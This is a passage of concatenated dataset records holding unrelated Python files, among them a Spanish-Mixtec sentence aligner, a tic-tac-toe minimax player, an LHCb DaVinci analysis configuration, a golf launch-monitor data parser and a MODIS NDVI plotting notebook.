\"\"\"\n t = 1 / (1 + 0.2316419 * z)\n return (1 - 0.3989423 * math.exp(-z * z / 2) *\n ((((1.330274429 * t - 1.821255978) * t\n + 1.781477937) * t - 0.356563782) * t + 0.319381530) * t)\n\n def norm_logsf(z):\n \"\"\" Logarithm of the survival function for N(0, 1) \"\"\"\n try:\n return math.log(1 - norm_cdf(z))\n except ValueError:\n return float('-inf')\n\n# Alignment costs: -100*log(p(x:y)/p(1:1))\nbead_costs = {\n (1, 1): 0,\n (2, 1): 230,\n (1, 2): 230,\n (0, 1): 450,\n (1, 0): 450,\n (2, 2): 440\n}\n\n# Length cost parameters\nmean_xy = 1\nvariance_xy = 6.8\nLOG2 = math.log(2)\n\ndef length_cost(sx, sy):\n \"\"\" 
-100*log[p(|N(0, 1)|>delta)] \"\"\"\n lx, ly = sum(sx), sum(sy)\n m = (lx + ly * mean_xy) / 2\n try:\n delta = (lx - ly * mean_xy) / math.sqrt(m * variance_xy)\n except ZeroDivisionError:\n return float('-inf')\n return - 100 * (LOG2 + norm_logsf(abs(delta)))\n\n\ndef _align(x, y):\n m = {}\n for i in range(len(x) + 1):\n for j in range(len(y) + 1):\n if i == j == 0:\n m[0, 0] = (0, 0, 0)\n else:\n m[i, j] = min((m[i-di, j-dj][0] +\n length_cost(x[i-di:i], y[j-dj:j]) +\n bead_cost,\n di, dj)\n for (di, dj), bead_cost in bead_costs.iteritems()\n if i-di>=0 and j-dj>=0)\n\n i, j = len(x), len(y)\n while True:\n (c, di, dj) = m[i, j]\n if di == dj == 0:\n break\n yield (i-di, i), (j-dj, j)\n i -= di\n j -= dj\n\n\ndef char_length(sentence):\n \"\"\" Length of a sentence in characters \"\"\"\n return sum(1 for c in sentence if c != ' ')\n\n#metodo de alineacion \ndef align(sx, sy):\n \"\"\" Align two groups of sentences \"\"\"\n cx = map(char_length, sx)\n cy = map(char_length, sy)\n for (i1, i2), (j1, j2) in reversed(list(_align(cx, cy))):\n yield ' '.join(sx[i1:i2]), ' '.join(sy[j1:j2])\n\ndef read_blocks(f):\n block = []\n for l in f:\n if not l.strip():\n yield block\n block = []\n else:\n block.append(l.strip())\n if block:\n yield block\n \ntotalelementos=0\ncuentaalineacion=0\ndef principal(rutasalida):\n \n listaespaniol=[]\n listamixteco=[]\n \n listaespaniol=modulopreprocesamiento.consultarcorpusespaniol()\n listamixteco=modulopreprocesamiento.consultarcorpusmixteco()\n \n for block_x,block_y in izip(listaespaniol,listamixteco):\n \n for (oracionorigen,oraciondestino) in align(block_x,block_y):\n \n global totalelementos\n totalelementos+=1\n global conn\n posicion=conn.cursor()\n #cursor.text_factory = str\n \n oracionorigen=oracionorigen.encode(\"utf-8\")\n oraciondestino=oraciondestino.encode(\"utf-8\")\n \n posicion.execute(\"INSERT INTO alineados(idalineacion,oracionespaniol,oracionmixteco) values(%s,%s,%s)\",(totalelementos,str(oracionorigen),str(oraciondestino)))\n \n print(\"----\"+str(totalelementos))\n \n conn.commit()\n print(\"alineaciones insertadas correctamente...\")\n\n print('%s ||| %s' % (oracionorigen, oraciondestino))\n \n archivo=codecs.open(rutasalida,encoding=\"utf8\",mode=\"w\")\n listaalineaciones=consultarAlineaciones()\n for x in listaalineaciones:\n global cuentaalineacion\n cuentaalineacion+=1\n texto=u\"#espaniol##mixteco##\"+x[0]+\"##\"+x[1]+'\\n'\n archivo.write(texto)\n \n #archivo.write(\" \"+str(totalelementos)+\" \")\n archivo.close()\n \neliminarTablaAlineaciones()\nmodulopreprocesamiento.limpiartablacorpusespaniol()\nmodulopreprocesamiento.limpiartablacorpusmixteco()\n \n","sub_path":"src/moduloalineador.py","file_name":"moduloalineador.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497288198","text":"listOfScores = []\nfor _ in range(int(input())):\n name = input()\n score = float(input())\n listOfScores.append([name,score])\nscoreList = [i[1] for i in listOfScores]\nsecondHighest = (sorted(set(scoreList),reverse=True)[-2])\n\nfor i in sorted(listOfScores):\n if i[1] == secondHighest:\n print(i[0])","sub_path":"code-files/Day-021-030/Day-21/Question-1/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"327221772","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport math\n\nX = \"X\"\nO = \"O\"\nEMPTY = 
None\n\n\ndef initial_state():\n    \"\"\"\n    Returns starting state of the board.\n    \"\"\"\n    return [[EMPTY, EMPTY, EMPTY],\n            [EMPTY, EMPTY, EMPTY],\n            [EMPTY, EMPTY, EMPTY]]\n\n\ndef player(board):\n    \"\"\"\n    Returns player who has the next turn on a board.\n    \"\"\"\n    num_of_x = 0\n    num_of_o = 0\n    for i in range(3):\n        for j in range(3):\n            if board[i][j] == \"X\":\n                num_of_x += 1\n            elif board[i][j] == \"O\":\n                num_of_o += 1\n\n    # X always moves first, so the counts are equal exactly when it is X's turn.\n    if num_of_x == num_of_o:\n        return \"X\"\n    else:\n        return \"O\"\n\n\ndef actions(board):\n    \"\"\"\n    Returns set of all possible actions (i, j) available on the board.\n    \"\"\"\n    set_of_actions = set()\n\n    for i in range(3):\n        for j in range(3):\n            if board[i][j] is None:\n                set_of_actions.add((i, j))\n\n    return set_of_actions\n\n\ndef result(board, action):\n    \"\"\"\n    Returns the board that results from making move (i, j) on the board.\n    \"\"\"\n    # Work on a copy so the minimax search never mutates the caller's board.\n    tmp_board = [row[:] for row in board]\n    tmp_board[action[0]][action[1]] = player(board)\n    return tmp_board\n\n\ndef winner(board):\n    \"\"\"\n    Returns the winner of the game, if there is one.\n    \"\"\"\n    # Columns (each check requires a non-empty cell so a blank line never matches).\n    if board[0][0] is not EMPTY and board[0][0] == board[1][0] and board[0][0] == board[2][0]:\n        return board[0][0]\n    if board[0][1] is not EMPTY and board[0][1] == board[1][1] and board[0][1] == board[2][1]:\n        return board[0][1]\n    if board[0][2] is not EMPTY and board[0][2] == board[1][2] and board[0][2] == board[2][2]:\n        return board[0][2]\n    # Rows\n    if board[0][0] is not EMPTY and board[0][0] == board[0][1] and board[0][0] == board[0][2]:\n        return board[0][0]\n    if board[1][0] is not EMPTY and board[1][0] == board[1][1] and board[1][0] == board[1][2]:\n        return board[1][0]\n    if board[2][0] is not EMPTY and board[2][0] == board[2][1] and board[2][0] == board[2][2]:\n        return board[2][0]\n    # Diagonals\n    if board[0][0] is not EMPTY and board[0][0] == board[1][1] and board[0][0] == board[2][2]:\n        return board[0][0]\n    if board[0][2] is not EMPTY and board[0][2] == board[1][1] and board[0][2] == board[2][0]:\n        return board[0][2]\n\n    return None\n\n\ndef terminal(board):\n    \"\"\"\n    Returns True if game is over, False otherwise.\n    \"\"\"\n    # The game ends as soon as someone wins, or when the board is full.\n    if winner(board) is not None:\n        return True\n\n    for i in range(3):\n        for j in range(3):\n            if board[i][j] == EMPTY:\n                return False\n    return True\n\n\ndef utility(board):\n    \"\"\"\n    Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n    \"\"\"\n    if winner(board) == \"X\":\n        return 1\n    elif winner(board) == \"O\":\n        return -1\n    else:\n        return 0\n\n\ndef find_max(board):\n    if terminal(board):\n        return utility(board)\n\n    best = -(2 ** 32)\n\n    for action in actions(board):\n        # After X moves it is O's turn, so the child state is evaluated with find_min.\n        res = find_min(result(board, action))\n\n        best = max(res, best)\n\n    return best\n\n\ndef find_min(board):\n    if terminal(board):\n        return utility(board)\n\n    best = 2 ** 32\n\n    for action in actions(board):\n        # After O moves it is X's turn, so the child state is evaluated with find_max.\n        res = find_max(result(board, action))\n\n        best = min(best, res)\n\n    return best\n\n\ndef minimax(board):\n    \"\"\"\n    Returns the optimal action for the current player on the board.\n    \"\"\"\n    if terminal(board):\n        return None\n\n    x = -1\n    y = -1\n\n    if player(board) == \"X\":\n        best = -(2 ** 32)\n\n        for action in actions(board):\n            # X wants the move whose resulting state has the highest min-value.\n            v = find_min(result(board, action))\n\n            if best < v:\n                x = action[0]\n                y = action[1]\n                best = v\n\n    else:\n        best = (2 ** 32)\n\n        for action in actions(board):\n            # O wants the move whose resulting state has the lowest max-value.\n            v = find_max(result(board, action))\n\n            if best > v:\n                x = action[0]\n                y = action[1]\n                best = v\n\n    return (x, y)\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"125459110","text":"# $Id: $\n# Test your line(s) of the stripping\n# \n# NOTE: Please make a copy of this file for your testing, and do NOT 
change this one!\n#\n\nfrom Gaudi.Configuration import *\n#from Configurables import DaVinci\nfrom StrippingConf.Configuration import StrippingConf\n\n# Tighten Trk Chi2 to <3\nfrom CommonParticles.Utils import DefaultTrackingCuts\nDefaultTrackingCuts().Cuts = { \"Chi2Cut\" : [ 0, 3 ],\n \"CloneDistCut\" : [5000, 9e+99 ] }\n\nfrom Configurables import DecayTreeTuple, FitDecayTrees, TupleToolRecoStats, TupleToolTrigger, TupleToolTISTOS, CondDB, SelDSTWriter\nfrom DecayTreeTuple.Configuration import *\n# Now build the stream\nfrom StrippingConf.StrippingStream import StrippingStream\nstream = StrippingStream(\"Test\")\n\n# Append your line\n\n\n\nfrom StrippingSelections.StrippingB2XMuMu import B2XMuMuConf\nfrom StrippingSelections.StrippingB2XMuMu import defaultConfig\n\n\n#inclusiveConfig['DIRA_HIGHQ2'] = -0.90\n#inclusiveConfig['DIRA_LOWQ2'] = 0.99\n#inclusiveConfig['VertexCHI2'] = 2.0\n#inclusiveConfig['Muon_PIDmu'] = 2\n#inclusiveConfig['Muon_MinIPCHI2'] = 16\n#inclusiveConfig['Muon_PT'] = 800\n#inclusiveConfig['WS'] = False\n#inclusiveConfig['LOWERMASS_LOWQ2'] = 1500\n#inclusiveConfig['UPPERMASS_LOWQ2'] = 2200\n\nIncXMuMuBuilder = B2XMuMuConf( name=\"B2XMuMu\", config=defaultConfig )\nstream.appendLines( IncXMuMuBuilder.lines() )\nIncXMuMuBuilder2 = B2XMuMuConf( name=\"B2XMuMu2\", config=defaultConfig )\n#stream.appendLines( IncXMuMuBuilder2.lines() )\n\n# Standard configuration of Stripping, do NOT change them\nfrom Configurables import ProcStatusCheck\nfilterBadEvents = ProcStatusCheck()\n\nsc = StrippingConf( Streams = [ stream ],\n MaxCandidates = 2000,\n AcceptBadEvents = False,\n BadEventSelection = filterBadEvents,\n TESPrefix = 'Strip'\n )\n\nfrom Configurables import AuditorSvc, ChronoAuditor\nAuditorSvc().Auditors.append( ChronoAuditor(\"Chrono\") )\n\nfrom Configurables import StrippingReport\nsr = StrippingReport(Selections = sc.selections())\n\nfrom Configurables import AlgorithmCorrelationsAlg\nac = AlgorithmCorrelationsAlg(Algorithms = sc.selections())\n\ntuple = DecayTreeTuple(\"Jpsi_Tuple\")\n\ntuple.Inputs = [\"Phys/B2XMuMu_Line/Particles\"]\n#tuple.Inputs = [\"Phys/B2XMuMuInclusive2_InclDiMuLowQ2Line/Particles\"]\n\n\ntuple.ToolList = [\n \"TupleToolKinematic\"\n , \"TupleToolEventInfo\"\n , \"TupleToolRecoStats\"\n # , \"TupleBuKmmFit\"\n]\n\n\ntuple.addBranches ({ \n \"muplus\" : \"[B+ -> (J/psi(1S) -> ^mu+ mu-) K+]CC\",\n \"muminus\" : \"[B+ -> (J/psi(1S) -> mu+ ^mu-) K+]CC\",\n \"Jpsi\" : \"[B+ -> ^(J/psi(1S) -> mu+ mu-) K+]CC\",\n \"Kplus\" : \"[B+ -> J/psi(1S) ^K+]CC\",\n \"Bplus\" : \"[B+ -> J/psi(1S) K+]CC\",\n})\nLoKi_All=tuple.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_All\")\nLoKi_All.Variables = {\n 'MINIPCHI2' : \"MIPCHI2DV(PRIMARY)\", \n 'MINIP' : \"MIPDV(PRIMARY)\",\n 'IPCHI2_OWNPV' : \"BPVIPCHI2()\", \n 'IP_OWNPV' : \"BPVIP()\"\n}\n\nLoKi_muplus=tuple.muplus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_muplus\")\nLoKi_muplus.Variables = {\n 'PIDmu' : \"PIDmu\",\n 'ghost' : \"TRGHP\",\n 'TRACK_CHI2' : \"TRCHI2DOF\",\n 'NNK' : \"PPINFO(PROBNNK)\",\n 'NNpi' : \"PPINFO(PROBNNpi)\",\n 'NNmu' : \"PPINFO(PROBNNmu)\"\n}\n\nLoKi_Kplus=tuple.Kplus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_Kplus\")\nLoKi_Kplus.Variables = {\n 'PIDK' : \"PIDK\",\n 'PIDmu' : \"PIDmu\",\n 'ghost' : \"TRGHP\",\n 'TRACK_CHI2' : \"TRCHI2DOF\",\n 'NNK' : \"PPINFO(PROBNNK)\",\n 'NNpi' : \"PPINFO(PROBNNpi)\",\n 'NNmu' : \"PPINFO(PROBNNmu)\"\n}\n\nLoKi_muminus=tuple.muminus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_Kminus\")\nLoKi_muminus.Variables = {\n 'PIDK' : \"PIDK\",\n 'PIDmu' : 
\"PIDmu\",\n 'ghost' : \"TRGHP\",\n 'TRACK_CHI2' : \"TRCHI2DOF\",\n 'NNK' : \"PPINFO(PROBNNK)\",\n 'NNpi' : \"PPINFO(PROBNNpi)\",\n 'NNmu' : \"PPINFO(PROBNNmu)\"\n}\n\n\nLoKi_Bplus=tuple.Bplus.addTupleTool(\"LoKi::Hybrid::TupleTool/LoKi_Bplus\")\nLoKi_Bplus.Variables = {\n 'DTF_CHI2' : \"DTF_CHI2NDOF(True)\",\n 'TAU' : \"BPVLTIME()\",\n 'DIRA_OWNPV' : \"BPVDIRA\",\n 'FD_CHI2' : \"BPVVDCHI2\",\n 'Mcorr' : \"BPVCORRM\",\n 'ENDVERTEX_CHI2' : \"VFASPF(VCHI2/VDOF)\",\n \"CONE_angle\" : \"RELINFO('Phys/B2XMuMu_Line/ConeIsoInfo','CONEANGLE', -1.)\",\n \"CONE_PT\" : \"RELINFO('Phys/B2XMuMu_Line/ConeIsoInfo','CONEPT', -1.)\",\n \"BDTIso\" : \"RELINFO('Phys/B2XMuMu_Line/VtxIsoBDTInfo','VTXISOBDTHARDFIRSTVALUE', -1.)\",\n \"NormalVtxIso\" : \"RELINFO('Phys/B2XMuMu_Line/VtxIsoInfo','VTXISONUMVTX', -1.)\"\n}\n\n\nlist = [\n \"L0DiMuonDecision\"\n , \"L0MuonDecision\"\n , \"Hlt1TrackAllL0Decision\"\n , \"Hlt1TrackMuonDecision\"\n , \"Hlt1DiMuonLowMassDecision\"\n , \"Hlt1DiMuonHighMassDecision\"\n , \"Hlt1SingleMuonHighPTDecision\"\n , \"Hlt2TopoMu2BodyBBDTDecision\"\n , \"Hlt2TopoMu3BodyBBDTDecision\"\n , \"Hlt2Topo2BodyBBDTDecision\"\n , \"Hlt2Topo3BodyBBDTDecision\"\n , \"Hlt2DiMuonDetachedDecision\"\n , \"Hlt2SingleMuonDecision\"\n , \"Hlt2DiMuonDetachedHeavyDecision\"\n]\n\ntuple.Decay = \"[B+ -> ^(J/psi(1S) -> ^mu+ ^mu-) ^K+]CC\"\nfrom Configurables import DaVinci\n#DaVinci().HistogramFile = 'DV_stripping_histos.root'\nDaVinci().EvtMax = 100000\nDaVinci().PrintFreq = 2000\nDaVinci().appendToMainSequence( [ sc.sequence() ] )\nDaVinci().appendToMainSequence( [ tuple ] )\nDaVinci().appendToMainSequence( [ sr ] )\nDaVinci().appendToMainSequence( [ ac ] )\nDaVinci().DataType = \"2015\"\n#DaVinci().InputType = \"DST\"\n\n# change the column size of timing table\nfrom Configurables import TimingAuditor, SequencerTimerTool\nTimingAuditor().addTool(SequencerTimerTool,name=\"TIMER\")\nTimingAuditor().TIMER.NameSize = 60\nNTupleSvc().Output = [\"FILE1 DATAFILE='rootfile.root' TYP='ROOT' OPT='NEW'\"]\nMessageSvc().Format = \"% F%60W%S%7W%R%T %0W%M\"\n\n# database\nDaVinci().DDDBtag = \"dddb-20120831\"\nDaVinci().CondDBtag = \"cond-20121008\"\n\n# input file\nfrom GaudiConf import IOHelper\n\nIOHelper().inputFiles(['./00049671_00004163_1.leptonic.mdst'], clear=True)\n\n","sub_path":"DaVinci_v39r1/tuplemaking/jpsikstPID2/data/2012/test_B2XMuMu.py","file_name":"test_B2XMuMu.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"442011962","text":"\"\"\"\nParse the raw data into a usable format.\n\"\"\"\n\nimport datetime\nfrom collections import defaultdict\nfrom typing import Any, Dict, List, Optional\n\nfrom upload.exceptions import ParsingException\n\n\nSKYTRAK_TIMESTAMP_FORMAT = \"%m/%d/%Y %I:%M %p\"\n\n\nclass SessionInfo:\n \"\"\"\n Metadata included in the Skytrak data files.\n \"\"\"\n\n def __init__(self) -> None:\n self.name: Optional[str] = None\n self.timestamp: Optional[datetime.datetime] = None\n self.type_: Optional[str] = None\n self.notes: Dict[str, str] = {}\n\n def json(self) -> Dict[str, Any]:\n if not all([self.name, self.type_, self.timestamp]):\n raise ParsingException(\"name, timestamp, or type missing from session info\")\n return {\n \"name\": self.name,\n \"timestamp\": self.timestamp.isoformat(timespec=\"minutes\"), # type: ignore\n \"session_type\": self.type_,\n \"notes\": self.notes,\n }\n\n\nclass Parser:\n pass\n\n\nclass RangeDataParser(Parser):\n \"\"\"\n Parses data of the raw shot 
data tables.\n\n This is the format of the data for the driving range, skills assessment, and\n game improvement when exporting the data from the history tab.\n \"\"\"\n\n COLUMNS = [\n \"SHOT\",\n \"HAND\",\n \"BALL\",\n \"LAUNCH\",\n \"BACK\",\n \"SIDE\",\n \"SIDE\",\n \"OFFLINE\",\n \"CARRY\",\n \"ROLL\",\n \"TOTAL\",\n \"FLIGHT\",\n \"DSCNT\",\n \"HEIGHT\",\n \"CLUB\",\n \"PTI\",\n ]\n NAMES = [\n \"shot_num\",\n \"hand\",\n \"ball_speed\",\n \"launch_angle\",\n \"back_spin\",\n \"side_spin\",\n \"side_angle\",\n \"offline_distance\",\n \"carry\",\n \"roll\",\n \"total\",\n \"hang_time\",\n \"descent_angle\",\n \"peak_height\",\n \"club_speed\",\n \"pti\",\n ]\n\n def __init__(self, data: List[List[str]]) -> None:\n self.raw_data = data\n self.session_info = SessionInfo()\n\n def extract_name(self) -> None:\n \"\"\"\n Extracts the username and sets its value in SessionInfo.\n \"\"\"\n try:\n field = self.raw_data[2][0]\n except IndexError:\n raise ParsingException(\n \"Could not extract name from data, name field not present\"\n )\n\n try:\n name = field.split(\":\")[1].strip()\n except IndexError:\n raise ParsingException(\n \"Could not extract name from data, incorrect field format\"\n )\n\n self.session_info.name = name.title()\n\n def extract_type(self) -> None:\n \"\"\"\n Extracts the session type and sets its value in SessionInfo.\n \"\"\"\n try:\n field = self.raw_data[1][0]\n except IndexError:\n raise ParsingException(\n \"Could not extract type from data, type field not present\"\n )\n\n try:\n type_ = field.split(\":\")[0].strip()\n except IndexError:\n raise ParsingException(\n \"Could not extract type from data, incorrect field format\"\n )\n\n self.session_info.type_ = type_.lower()\n\n def extract_timestamp(self) -> None:\n \"\"\"\n Extracts the timestamp of the session and sets its value in SessionInfo.\n \"\"\"\n try:\n field = self.raw_data[1][0]\n except IndexError:\n raise ParsingException(\n \"Could not extract timestamp from data, timestamp field not present\"\n )\n\n try:\n timestamp = field.split(\":\", 1)[1].strip()\n except IndexError:\n raise ParsingException(\n \"Could not extract timestamp from data, incorrect field format\"\n )\n\n self.session_info.timestamp = datetime.datetime.strptime(\n timestamp, SKYTRAK_TIMESTAMP_FORMAT\n )\n\n def extract_notes(self) -> None:\n \"\"\"\n Extracts the session notes that are included in the export field\n and sets its value in SessionInfo.\n \"\"\"\n pass\n\n def verify_columns(self) -> None:\n \"\"\"\n Verifies that the columns of the data are expected.\n \"\"\"\n try:\n row = self.raw_data[4]\n except IndexError:\n raise ParsingException(\n \"Could not extract columns from data, column row not present\"\n )\n\n if row != self.COLUMNS:\n raise ParsingException(\"Invalid columns for Range Data\")\n\n def data_by_club(self) -> Dict[str, List[List[str]]]:\n \"\"\"\n Gathers the data by club from the raw data and combines them\n for the given club.\n \"\"\"\n data: Dict[str, List[List[str]]] = defaultdict(list)\n started = False\n club = \"\"\n for row in self.raw_data:\n if not started:\n if row[0] == \"#\":\n started = True\n continue\n\n if not row[0] or row[0] == \"AVG\":\n continue\n\n if row[0] == \"NOTES\":\n break\n\n try:\n int(row[0])\n except ValueError:\n data_row = False\n else:\n data_row = True\n\n if data_row:\n data[club].append(row)\n else:\n club = row[0].split(\"#\")[0].strip().lower()\n\n return data\n\n def data_rows(self) -> List[Dict[str, str]]:\n \"\"\"\n Transforms the data by club 
into a large list of dicts.\n \"\"\"\n data: List[Dict[str, str]] = []\n shot_num = 1\n for club, rows in self.data_by_club().items():\n for row in rows:\n row_dict = {}\n for n, item in enumerate(row):\n row_dict[self.NAMES[n]] = item\n row_dict[\"club\"] = club\n row_dict[\"shot_num\"] = str(shot_num)\n data.append(row_dict)\n shot_num += 1\n\n return data\n\n def json(self) -> Dict[str, Any]:\n \"\"\"\n Calls all verification and extraction steps then adds the metadata\n to each row.\n \"\"\"\n self.verify_columns()\n self.extract_name()\n self.extract_type()\n self.extract_timestamp()\n self.extract_notes()\n data = self.session_info.json()\n data[\"shots\"] = self.data_rows()\n return data\n\n\nPARSER_MAPPING = {\"driving range\": RangeDataParser}\n\n\ndef json_from_raw(data: List[List[str]], session_type: str) -> Dict[str, Any]:\n \"\"\"\n Returns formatted json data for the given raw data type.\n \"\"\"\n parser = PARSER_MAPPING[session_type](data)\n return parser.json()\n","sub_path":"upload/upload/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"155245243","text":"from typing import TypeVar, Dict, NoReturn, Optional\nimport pokemon.status.pokemon_status as pst\n\nSTATUS: Dict[str, 'pst.Status'] = {}\n\nT = TypeVar('T', )\n\n\ndef register(it: T) -> T:\n\n if it.id_ in STATUS:\n raise ValueError(\"duplicate key in items registry {}\".format(it.id_))\n\n STATUS[it.id_] = it\n return it\n\n\nBURN: Optional['pst.BurnStatus'] = None\nFLINCH: Optional['pst.FlinchingStatus'] = None\n\n\ndef load() -> NoReturn:\n global BURN, FLINCH\n BURN = register(pst.BurnStatus(\"burn\"))\n FLINCH = register(pst.FlinchingStatus(\"flinch\"))\n print(STATUS)\n","sub_path":"pokemon/status/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"533412782","text":"\n# coding: utf-8\n\n# ## Take a look at channel 1 and NDVI at full resolution for Vancouver\n# \n# * [Modis channel listing](https://modis.gsfc.nasa.gov/about/specifications.php)\n# \n# * Band 1 centered at 0.645 microns (red)\n# \n# * data acquired at 250 m resolution, August 11, 2016\n# \n# * I've written the measurements between -125 -> -120 deg lon and 45-50 degrees lat to\n# an hdf: vancouver_hires.h5, download in the cell below\n# \n# * see what channel 1 and the [ndvi](https://en.wikipedia.org/wiki/Normalized_Difference_Vegetation_Index) look like at 250 meter resolution\n\n# In[1]:\n\nfrom a301utils.a301_readfile import download\nimport numpy as np\nimport h5py\nimport sys\nimport a301lib\nfrom a301lib.geolocate import fast_hist, fast_avg, fast_count,make_plot \nfrom a301lib.radiation import planckInvert\nfrom matplotlib import pyplot as plt\n#\n# use hdfview to see the structure of this file\n#\nfilename = 'vancouver_hires.h5'\ndownload(filename)\nh5_file=h5py.File(filename)\n\n\n# In[ ]:\n\n\n\n\n# In[2]:\n\nlat_data=h5_file['latlon']['lat'][...]\nlon_data=h5_file['latlon']['lon'][...]\nfrom a301lib.geolocate import find_corners\ncorners=find_corners(lat_data,lon_data)\n\n\n# Here is the corresponding red,green,blue color composite for the granule.\n\n# In[3]:\n\nfrom IPython.display import Image\nImage(url='figures/MYBRGB.A2016224.2100.006.2016237025650.jpg',width=600)\n\n\n# In[4]:\n\nget_ipython().magic('matplotlib 
inline')\nindex=0\nchan1_refl=h5_file['data_fields']['chan1'][...]\nchan2_refl=h5_file['data_fields']['chan2'][...]\nndvi = (chan2_refl - chan1_refl)/(chan2_refl + chan1_refl)\nplt.hist(ndvi.ravel()) # flatten to 1-D so hist sees one dataset, not one per column\nax=plt.gca() #get current axis\n_=ax.set(title='ndvi Vancouver')\n\n\n# Now bin the channel 1 reflectance and the NDVI onto a regular lat/lon grid with fast_hist and fast_avg\n\n# In[5]:\n\nlon_min= -125\nlon_max = -120\n\nlat_min = 45\nlat_max = 50\nbinsize = 0.008\n\nlon_hist = fast_hist(lon_data.ravel(),lon_min,lon_max,binsize=binsize)\nlat_hist = fast_hist(lat_data.ravel(),lat_min,lat_max,binsize=binsize)\ngridded_chan1 = fast_avg(lat_hist,lon_hist,chan1_refl.ravel())\ngridded_ndvi = fast_avg(lat_hist,lon_hist,ndvi.ravel())\n\n\n# In[6]:\n\nlat_centers=lat_hist['centers_vec']\nlon_centers=lon_hist['centers_vec']\nlon_array,lat_array=np.meshgrid(lon_centers,lat_centers)\nprint(lon_array.shape)\nmasked_reflects = np.ma.masked_invalid(gridded_chan1)\nmasked_ndvi = np.ma.masked_invalid(gridded_ndvi)\n\n\n# Here is an example of a seaborn colormap with five xkcd colors\n\n# In[7]:\n\nimport seaborn as sns\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap \ndef five_colors():\n colors = [\"royal blue\", \"baby blue\", \"eggshell\", \"burnt red\", \"soft pink\"]\n #print([the_color for the_color in colors])\n colors=[sns.xkcd_rgb[the_color] for the_color in colors]\n cmap=ListedColormap(colors,N=5)\n cmap.set_over('w')\n cmap.set_under('k') #black\n cmap.set_bad('0.75') #75% grey\n return cmap\n\n\n# and here is our previous colormap\n\n# In[8]:\n\nfrom matplotlib import cm\nfrom matplotlib.colors import Normalize\ndef continuous_colors():\n cmap=cm.YlGnBu_r #see http://wiki.scipy.org/Cookbook/Matplotlib/Show_colormaps\n cmap.set_over('w')\n cmap.set_under('b',alpha=0.1)\n cmap.set_bad('0.75') #75% grey\n return cmap\n\n\n# In[12]:\n\n#\n# choose one of the two\n#\ncmap = continuous_colors()\ncmap = five_colors()\n\n#\n# set the range over which the palette extends so I\n# use all my colors on data between vmin and vmax\n#\nvmin= 0.0\nvmax= 0.07\nthe_norm=Normalize(vmin=vmin,vmax=vmax,clip=False)\nfig,ax = plt.subplots(1,1,figsize=(14,18))\ncorners['ax'] = ax\ncorners['resolution']='i'\ncorners['projection']='lcc'\ncorners['urcrnrlon'] = -120.\ncorners['urcrnrlat'] = 50\ncorners['llcrnrlat'] = 45\ncorners['llcrnrlon'] = -125.\nproj = make_plot(corners,lat_sep=1,lon_sep=1)\nlon_array,lat_array=np.meshgrid(lon_centers,lat_centers)\n#\n# translate every lat,lon pair in the scene to x,y plotting coordinates \n# for the Lambert projection\n#\nx,y=proj(lon_array,lat_array)\nCS=proj.pcolormesh(x, y,masked_reflects, cmap=cmap, norm=the_norm)\nCBar=proj.colorbar(CS, 'right', size='5%', pad='5%',extend='both')\nCBar.set_label('Channel 1 reflectance',\n rotation=270,verticalalignment='bottom',size=18)\n_=ax.set_title('Modis Channel 1, August 11, 2016 Vancouver',size=22)\n\n\n# In[10]:\n\nvmin= -0.5\nvmax= 0.8\nthe_norm=Normalize(vmin=vmin,vmax=vmax,clip=False)\nfig,ax2 = plt.subplots(1,1,figsize=(14,18))\ncorners['ax']=ax2\nproj = make_plot(corners,lat_sep=1,lon_sep=1)\nCS=proj.pcolormesh(x, y,masked_ndvi, cmap=cmap, norm=the_norm)\nCBar=proj.colorbar(CS, 'right', size='5%', pad='5%',extend='both')\nCBar.set_label('NDVI',\n rotation=270,verticalalignment='bottom',size=18)\n_=ax2.set_title('Modis NDVI, August 11, 2016 Vancouver',size=22)\n\n\n# In[ 
]:\n\n\n\n","sub_path":"notebooks/python/vancouver_visible.py","file_name":"vancouver_visible.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"271211138","text":"# Copyright 2014 - Savoir-Faire Linux inc.\n# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport sys\nimport unittest\n\nfrom mox3 import mox\nimport six\n\nfrom surveilclient.common import http\nfrom surveilclient import exc\nfrom surveilclient import shell as surveil_shell\n\n\nclass ShellBase(unittest.TestCase):\n\n def setUp(self):\n super(ShellBase, self).setUp()\n self.m = mox.Mox()\n self.m.StubOutWithMock(http.HTTPClient, 'json_request')\n self.addCleanup(self.m.VerifyAll)\n self.addCleanup(self.m.UnsetStubs)\n\n # Some tests set exc.verbose = 1, so reset on cleanup\n def unset_exc_verbose():\n exc.verbose = 0\n\n self.addCleanup(unset_exc_verbose)\n\n def shell(self, argstr):\n orig = sys.stdout\n try:\n sys.stdout = six.StringIO()\n _shell = surveil_shell.SurveilShell()\n _shell.main(argstr.split())\n self.subcommands = 